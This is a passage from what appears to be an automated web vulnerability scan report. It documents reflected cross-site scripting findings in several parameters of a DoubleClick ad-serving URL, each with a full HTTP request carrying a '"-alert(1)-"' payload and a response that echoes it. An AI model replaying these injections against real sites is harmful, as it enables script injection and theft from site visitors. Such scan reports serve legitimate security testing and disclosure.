GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253Af33e6"-alert(1)-"c79dbcd5ee&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:29:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7206

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
/17/14a/%2a/q%3B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253Af33e6"-alert(1)-"c79dbcd5ee&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAA
...[SNIP]...

2.21. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [oepartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13b18"-alert(1)-"5dc3b23c1c5 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=13b18"-alert(1)-"5dc3b23c1c5&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
17%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=13b18"-alert(1)-"5dc3b23c1c5&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q2
...[SNIP]...

2.22. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [orh parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac689"-alert(1)-"dc8c391f7a was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=ac689"-alert(1)-"dc8c391f7a&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7206

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
c%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=ac689"-alert(1)-"dc8c391f7a&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=O
...[SNIP]...

2.23. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4838"-alert(1)-"8c657af55e4 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=f4838"-alert(1)-"8c657af55e4&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:30:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
%2a/q%3B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=f4838"-alert(1)-"8c657af55e4&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=20
...[SNIP]...

2.24. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pdom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2449a"-alert(1)-"02e7851709b was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=2449a"-alert(1)-"02e7851709b&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
//adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=2449a"-alert(1)-"02e7851709b&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET
...[SNIP]...

2.25. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68347"-alert(1)-"a281dbf653d was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP68347"-alert(1)-"a281dbf653d&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP68347"-alert(1)-"a281dbf653d&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-96463%7CHardware%7C300x250-_-BRAND_MEDLAR_NETWORKING_N
...[SNIP]...

2.26. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d7a7"-alert(1)-"af455f9762e was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=6d7a7"-alert(1)-"af455f9762e&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
18%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=6d7a7"-alert(1)-"af455f9762e&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://ww
...[SNIP]...

2.27. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80b7b"-alert(1)-"3fb9e79be61 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=10080b7b"-alert(1)-"3fb9e79be61&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=10080b7b"-alert(1)-"3fb9e79be61&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/
...[SNIP]...

2.28. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [ppartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a66f"-alert(1)-"7cd177737c8 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=5a66f"-alert(1)-"7cd177737c8&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=5a66f"-alert(1)-"7cd177737c8&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-
...[SNIP]...

2.29. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e566b"-alert(1)-"9a7ddde7086 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

